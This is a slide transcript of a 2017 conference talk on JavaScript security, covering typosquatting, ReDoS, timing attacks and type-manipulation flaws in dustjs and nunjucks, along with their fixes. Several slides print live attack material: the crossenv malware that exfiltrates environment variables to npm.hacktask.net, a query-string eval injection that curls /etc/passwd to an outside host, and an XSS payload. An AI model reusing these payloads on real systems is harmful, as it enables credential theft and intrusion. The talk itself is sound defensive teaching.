Upgrade to Pro — share decks privately, control downloads, hide ads and more …

JavaScript Exposed at Midwest JS

Tim Kadlec
August 17, 2017
Technology
3
270

JavaScript Exposed at Midwest JS

Thanks to the a vibrant ecosystem and server-side runtimes like Node.js, our sites and applications are using more JavaScript than ever before. With so much JavaScript tied to critical functionality, understanding the security implications of that JavaScript is absolutely crucial so that we're not leaving our businesses, and our users, exposed.

In this talk, we'll go through some of the more interesting security JavaScript vulnerabilities so that we can see how they work, what they can impact, and most importantly, how to fix them.

Presented at MidwestJS in Minneapolis on August 17, 2017.

Tim Kadlec

August 17, 2017
Tweet

More Decks by Tim Kadlec

See All by Tim Kadlec
The State of Node.js Security, at Node.js Interactive 2017
tkadlec
1
310
Focusing On What Matters, at Fluent, 2017
tkadlec
0
130
Once More, With Feeling at Code 2016 in Sydney
tkadlec
1
630
Once More, With Feeling
tkadlec
9
1.6k
Mobile Image Processing at London Web Perf Meetup, 2016
tkadlec
1
170
Better By Proxy at Velocity NY 2015
tkadlec
3
630
Getting Started with Performance Budgets at HighEdWeb Technical Academy, 2015
tkadlec
9
1.2k
Reaching Everyone, Fast at From the Front, 2015
tkadlec
8
6.9k
Better by Proxy at Smashing Conf NY
tkadlec
2
830

Other Decks in Technology

See All in Technology
The Rise of LLMOps
asei
7
1.4k
Can We Measure Developer Productivity?
ewolff
1
150
Terraform Stacks入門 #HashiTalks
msato
0
350
Exadata Database Service on Dedicated Infrastructure(ExaDB-D) UI スクリーン・キャプチャ集
oracle4engineer
PRO
2
3.2k
Incident Response Practices: Waroom's Features and Future Challenges
rrreeeyyy
0
160
Why does continuous profiling matter to developers? #appdevelopercon
salaboy
0
190
Introduction to Works of ML Engineer in LY Corporation
lycorp_recruit_jp
0
110
【Pycon mini 東海 2024】Google Colaboratoryで試すVLM
kazuhitotakahashi
2
500
スクラムチームを立ち上げる〜チーム開発で得られたもの・得られなかったもの〜
ohnoeight
2
350
The Role of Developer Relations in AI Product Success.
giftojabu1
0
120
AIチャットボット開発への生成AI活用
ryomrt
0
170
rootlessコンテナのすゝめ - 研究室サーバーでもできる安全なコンテナ管理
kitsuya0828
3
380

Featured

See All Featured
Fashionably flexible responsive web design (full day workshop)
malarkey
405
65k
BBQ
matthewcrist
85
9.3k
Making Projects Easy
brettharned
115
5.9k
GraphQLとの向き合い方2022年版
quramy
43
13k
Fantastic passwords and where to find them - at NoRuKo
philnash
50
2.9k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
Ruby is Unlike a Banana
tanoku
97
11k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k
Build The Right Thing And Hit Your Dates
maggiecrowley
33
2.4k
Documentation Writing (for coders)
carmenintech
65
4.4k
RailsConf 2023
tenderlove
29
900

Transcript

  1. JAVASCRIPT EXPOSED Tim Kadlec | @tkadlec

  2. None

  3. TYPOSQUATTING

  4. None

  5. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <[email protected]> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  6. { "name": "crossenv", "version": "6.1.1", "description": "Run scripts that set

    and use environment variables across platforms", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node package-setup.js" }, "author": "Kent C. Dodds <[email protected]> (http://kentcdodds.com/)", "license": "ISC", "dependencies": { "cross-env": "^5.0.1" } }

  7. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  8. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();

  9. const host = 'npm.hacktask.net'; const env = JSON.stringify(process.env); const data

    = new Buffer(env).toString('base64'); const postData = querystring.stringify({ data }); const options = { hostname: host, port: 80, path: '/log', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': Buffer.byteLength(postData); } }; const req = http.request(options); req.write(postData); req.end();
  10. None
  11. None
  12. None
  13. None

  14. CAN YOU TRUST THIRD-PARTY CODE?

  15. THE RISK OF ABSTRACTIONS

  16. ~83% FIND A VULNERABILITY

  17. None

  18. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send();

  19. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  20. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  21. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  22. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  23. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  24. $.getJSON('/my/url', {}) .done(function(){ // Success! }) .fail(function(){ // Error! });

  25. var request = new XMLHttpRequest(); request.open('GET', '/my/url', true); request.onload =

    function() { if (request.status >= 200 && request.status < 400) { // Success! var data = JSON.parse(request.responseText); } else { // Error! } }; request.onerror = function() { // Something went wrong }; request.send(); }

  26. $.getJSON('/my/url', {}) .done(function(){ // Success! }) .fail(function(){ // Error! });

  27. $.get('/my/url', {});

  28. JS fatigue

  29. JS fatigue

  30. JS fatigue

  31. CAN YOU TRUST THIRD-PARTY CODE?

  32. CAN YOU TRUST CODE?

  33. None

  34. HACKED WILL BE HACKED

  35. HACKED WILL BE HACKED

  36. 20-30 bugs per 1,000 lines of code

  37. 77% USE A VULNERABLE JS LIBRARY

  38. NOT GREAT BUT FIXABLE

  39. EVERYONE’S RESPONSIBILITY

  40. WEAKNESSES IN THE LANGUAGE & ECOSYSTEM

  41. THE EVENT LOOP

  42. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  43. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  44. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  45. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  46. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second() first()

  47. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second() first()

  48. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  49. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second(); second()

  50. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ first(); console.log("How's it going?"); }; second();

  51. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();

  52. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();

  53. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second()

  54. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second()

  55. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() setTimeout()

  56. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() 0ms, console.log

  57. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  58. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  59. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() first() console.log

  60. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() first() console.log

  61. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  62. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); second() console.log

  63. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  64. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  65. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second(); console.log

  66. var first = function(){ console.log('Hey Midwest JS'); }; var second

    = function(){ setTimeout(function(){ console.log("How's it going?"); }, 0); first(); }; second();
  67. None

  68. ReDoS REGULAR EXPRESSION DENIAL OF SERVICE

  69. var regex = /A(B|C+)+D/;

  70. var regex = /A(B|C+)+D/; A

  71. var regex = /A(B|C+)+D/; (B|C+)

  72. var regex = /A(B|C+)+D/; +

  73. var regex = /A(B|C+)+D/; D

  74. var regex = /A(B|C+)+D/; ABBD ABCCCCD ABCBCCCD ACCCCCD

  75. None
  76. None
  77. None
  78. None

  79. ACCCX CCC CC+C C+CC C+C+C var regex = /A(B|C+)+D/;

  80. String Number of C’s Number of Steps ACCCX 3 38

    ACCCCX 4 71 ACCCCCX 5 136 ACCCCCCCCCCCCCCX 14 65,553
  81. None

  82. moment().format('MMM Do YY');

  83. moment().format('MMM Do YY'); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  84. moment().format('MMM Do YY'); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/; \s+)

  85. m().format("D MMN MMMM"); var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  86. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s+) +MMMM?/;

  87. var MONTHS_IN_FORMAT = /D[oD]?(\[[^\[\]]*\]|\s +)MMMM?/;

  88. None

  89. TIMING ATTACK

  90. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; }

  91. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; } token == ADMIN_UUID

  92. foo == bar

  93. foo == bar f b

  94. foo == fox

  95. foo == fox f f

  96. foo == fox fo fo

  97. foo == fox foo fox

  98. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; if (token

    == ADMIN_UUID) { return true; } return false; }

  99. function isAdminToken(token) { var ADMIN_UUID = "28ec1f1c-a87a-43ac-8d9a- e6d0ddb8bbba"; var mismatch

    = 0; for (var i = 0; i < token.length; ++i) { mismatch |= (token.charCodeAt(i) ^ ADMIN_UUID.charCodeAt(i)); } return mismatch; }

  100. DYNAMIC TYPING

  101. var foo = true; foo = 1; foo = "hotdogs";

  102. TYPE MANIPULATION

  103. None

  104. {@if cond="'{device}' == 'desktop'"} <div>Desktop version</div> {:else} <div>Mobile Version</div> {/if}

  105. "if": function( chunk, context, bodies, params ){ ... var cond

    = params.cond; cond = dust.helpers.tap(cond, chunk, context); // eval expressions with given dust references if(eval(cond)){ ... } }

  106. NEVER TRUST USER INPUT

  107. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }

  108. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }
  109. None

  110. qs.parse('a'); // {a : ''}

  111. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

  112. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'}

  113. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'} qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']}

  114. qs.parse('a'); // {a : ''} qs.parse('a=foo'); // {a : 'foo'}

    qs.parse('a=foo&b=bar'); // {a : 'foo', b: ‘bar'} qs.parse('a=foo&a=bar'); // {a : ['foo', 'bar']} qs.parse('a[]=foo'); // {a : ['foo']}

  115. https://host/demo?device[]=&device[]=

  116. https://host/demo?device[]=&device[]= { device: [ '', '' ] }

  117. https://host/demo?device[]=x&device[]=y'- require('child_process').exec(‘curl+-F +"x=`cat+/etc/passwd`"+artsploit.com')-' eval("'xy'- require('child_process').exec('curl -F \"x=`cat /etc/passwd`\" attacker.com')-'' ==

    'desktop'");

  118. DISALLOW DISALLOW NON-STRING PARAMETERS

  119. NORMALIZE CONVERT TO SINGLE INPUT TYPE

  120. CUSTOM HANDLING SPECIFIC HANDLING FOR ALLOWED TYPES

  121. dust.escapeHtml = function(s) { if (typeof s === 'string') {

    if (!HCHARS.test(s)) { return s; } return s.replace(AMP,'&amp;').replace(...) // more char replacements } return s; }

  122. dust.escapeHtml = function(s) { if (typeof s === "string" ||

    (s && typeof s.toString === "function")) { if (typeof s !== "string") { s = s.toString(); } if (!HCHARS.test(s)) { return s; } } };
  123. None

  124. nunjucks.renderString( 'Hello ', {username: ‘<script>alert(1)</script>' });

  125. nunjucks.renderString( 'Hello ', {username: ‘<script>alert(1)</script>' }); Hello &lt;script&gt;alert(1)&lt;script&gt;

  126. escape: function(str) { if(typeof str === 'string') { return r.markSafe(lib.escape(str));

    } return str; }

  127. escape: function(str) { if(typeof str === 'string') { return r.markSafe(lib.escape(str));

    } return str; }

  128. http://host/?username[]=<script>alert(1)</ script>matt nunjucks.renderString( 'Hello ', {username: ['<script>alert(1)</ script>matt'] });

  129. if(autoescape && !(val instanceof SafeString)) { val = lib.escape(val.toString()); }

  130. KNOW WHAT HAPPENS UNDER THE HOOD

  131. FOUNDATIONAL KNOWLEDGE & CREATIVITY

  132. NOT GREAT BUT FIXABLE

  133. THANK YOU Tim Kadlec | @tkadlec